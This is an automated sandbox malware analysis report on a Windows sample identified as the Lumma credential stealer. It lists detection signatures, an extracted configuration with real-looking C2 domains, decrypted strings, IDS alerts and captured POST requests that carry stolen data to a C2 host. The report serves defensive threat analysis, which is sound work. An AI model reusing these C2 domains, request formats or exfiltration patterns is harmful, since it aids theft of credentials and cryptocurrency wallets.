Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
661fW9gxDp.exe

Overview

General Information

Sample name:661fW9gxDp.exe
renamed because original name is a hash value
Original sample name:18c608e128d658aef6e267668ddb68e2.exe
Analysis ID:1578074
MD5:18c608e128d658aef6e267668ddb68e2
SHA1:8da573d37440d3761aa89abec9f9efc0ee8773a6
SHA256:1fe8d27012da0553ebe43b42313f32264779c2bc697df26bba458348dfec6607
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 661fW9gxDp.exe (PID: 7684 cmdline: "C:\Users\user\Desktop\661fW9gxDp.exe" MD5: 18C608E128D658AEF6E267668DDB68E2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["crosshuaht.lat", "sustainskelet.lat", "energyaffai.lat", "aspecteirs.lat", "grannyejh.lat", "sweepyribs.lat", "necklacebudi.lat", "discokeyus.lat", "rapeflowwj.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: 661fW9gxDp.exe PID: 7684JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: 661fW9gxDp.exe PID: 7684JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: 661fW9gxDp.exe PID: 7684JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:36:34.600746+010020283713Unknown Traffic192.168.2.949717104.21.64.80443TCP
              2024-12-19T08:36:36.729541+010020283713Unknown Traffic192.168.2.949723104.21.64.80443TCP
              2024-12-19T08:36:39.215752+010020283713Unknown Traffic192.168.2.949728104.21.64.80443TCP
              2024-12-19T08:36:41.495031+010020283713Unknown Traffic192.168.2.949734104.21.64.80443TCP
              2024-12-19T08:36:43.756933+010020283713Unknown Traffic192.168.2.949742104.21.64.80443TCP
              2024-12-19T08:36:46.568113+010020283713Unknown Traffic192.168.2.949749104.21.64.80443TCP
              2024-12-19T08:36:49.282619+010020283713Unknown Traffic192.168.2.949758104.21.64.80443TCP
              2024-12-19T08:36:53.055358+010020283713Unknown Traffic192.168.2.949769104.21.64.80443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:36:35.509186+010020546531A Network Trojan was detected192.168.2.949717104.21.64.80443TCP
              2024-12-19T08:36:37.545026+010020546531A Network Trojan was detected192.168.2.949723104.21.64.80443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:36:35.509186+010020498361A Network Trojan was detected192.168.2.949717104.21.64.80443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:36:37.545026+010020498121A Network Trojan was detected192.168.2.949723104.21.64.80443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:36:34.600746+010020583651Domain Observed Used for C2 Detected192.168.2.949717104.21.64.80443TCP
              2024-12-19T08:36:36.729541+010020583651Domain Observed Used for C2 Detected192.168.2.949723104.21.64.80443TCP
              2024-12-19T08:36:39.215752+010020583651Domain Observed Used for C2 Detected192.168.2.949728104.21.64.80443TCP
              2024-12-19T08:36:41.495031+010020583651Domain Observed Used for C2 Detected192.168.2.949734104.21.64.80443TCP
              2024-12-19T08:36:43.756933+010020583651Domain Observed Used for C2 Detected192.168.2.949742104.21.64.80443TCP
              2024-12-19T08:36:46.568113+010020583651Domain Observed Used for C2 Detected192.168.2.949749104.21.64.80443TCP
              2024-12-19T08:36:49.282619+010020583651Domain Observed Used for C2 Detected192.168.2.949758104.21.64.80443TCP
              2024-12-19T08:36:53.055358+010020583651Domain Observed Used for C2 Detected192.168.2.949769104.21.64.80443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:36:33.224767+010020583641Domain Observed Used for C2 Detected192.168.2.9654321.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:36:33.085082+010020583781Domain Observed Used for C2 Detected192.168.2.9580661.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:36:47.431200+010020480941Malware Command and Control Activity Detected192.168.2.949749104.21.64.80443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-19T08:36:49.286427+010028438641A Network Trojan was detected192.168.2.949758104.21.64.80443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: 661fW9gxDp.exeAvira: detected
              Antivirus detection for URL or domain
              Source: https://grannyejh.lat/kAvira URL Cloud: Label: malware
              Source: https://grannyejh.lat/LAvira URL Cloud: Label: malware
              Source: https://grannyejh.lat:443/apiyAvira URL Cloud: Label: malware
              Source: https://grannyejh.lat/6Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 661fW9gxDp.exe.7684.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "sustainskelet.lat", "energyaffai.lat", "aspecteirs.lat", "grannyejh.lat", "sweepyribs.lat", "necklacebudi.lat", "discokeyus.lat", "rapeflowwj.lat"], "Build id": "PsFKDg--pablo"}
              Multi AV Scanner detection for submitted file
              Source: 661fW9gxDp.exeVirustotal: Detection: 50%Perma Link
              Source: 661fW9gxDp.exeReversingLabs: Detection: 65%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: 661fW9gxDp.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapeflowwj.lat
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: sustainskelet.lat
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: aspecteirs.lat
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: energyaffai.lat
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacebudi.lat
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: discokeyus.lat
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: grannyejh.lat
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: sweepyribs.lat
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1577736874.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
              Source: 661fW9gxDp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.80:443 -> 192.168.2.9:49758 version: TLS 1.2
              Source: C:\Users\user\Desktop\661fW9gxDp.exeDirectory queried: number of queries: 1001

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.9:58066 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.9:65432 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49728 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49723 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49717 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49734 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49742 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49758 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49749 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2058365 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI) : 192.168.2.9:49769 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49723 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49723 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49749 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.9:49758 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49717 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49717 -> 104.21.64.80:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: crosshuaht.lat
              Source: Malware configuration extractorURLs: sustainskelet.lat
              Source: Malware configuration extractorURLs: energyaffai.lat
              Source: Malware configuration extractorURLs: aspecteirs.lat
              Source: Malware configuration extractorURLs: grannyejh.lat
              Source: Malware configuration extractorURLs: sweepyribs.lat
              Source: Malware configuration extractorURLs: necklacebudi.lat
              Source: Malware configuration extractorURLs: discokeyus.lat
              Source: Malware configuration extractorURLs: rapeflowwj.lat
              Source: Joe Sandbox ViewIP Address: 104.21.64.80 104.21.64.80
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49728 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49723 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49717 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49734 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49742 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49758 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49749 -> 104.21.64.80:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49769 -> 104.21.64.80:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: grannyejh.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PAPFBR4QJTLV5VSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12827Host: grannyejh.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J0AX77C9TIVJ7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15033Host: grannyejh.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PEPULYB9QC75IWHJ1QGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20585Host: grannyejh.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XEG88966N4NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1180Host: grannyejh.lat
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1B66W53CLPJIG2NL2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584873Host: grannyejh.lat
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
              Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: grannyejh.lat
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: 661fW9gxDp.exe, 00000000.00000003.1575776408.0000000000CC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microHM
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: 661fW9gxDp.exe, 00000000.00000003.1469292388.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
              Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
              Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 661fW9gxDp.exe, 661fW9gxDp.exe, 00000000.00000003.1537994479.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1571502939.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577599879.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/
              Source: 661fW9gxDp.exe, 00000000.00000003.1537994479.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1571502939.0000000000CE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/6
              Source: 661fW9gxDp.exe, 00000000.00000002.1577599879.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/L
              Source: 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/api
              Source: 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/apit
              Source: 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat/k
              Source: 661fW9gxDp.exe, 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api
              Source: 661fW9gxDp.exe, 00000000.00000003.1575977746.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000002.1577296879.0000000000C54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/apiy
              Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: 661fW9gxDp.exe, 00000000.00000003.1470101487.0000000005B9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: 661fW9gxDp.exe, 00000000.00000003.1470454881.000000000590F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
              Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: 661fW9gxDp.exe, 00000000.00000003.1424189183.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424105365.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 661fW9gxDp.exe, 00000000.00000003.1424020620.00000000058BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
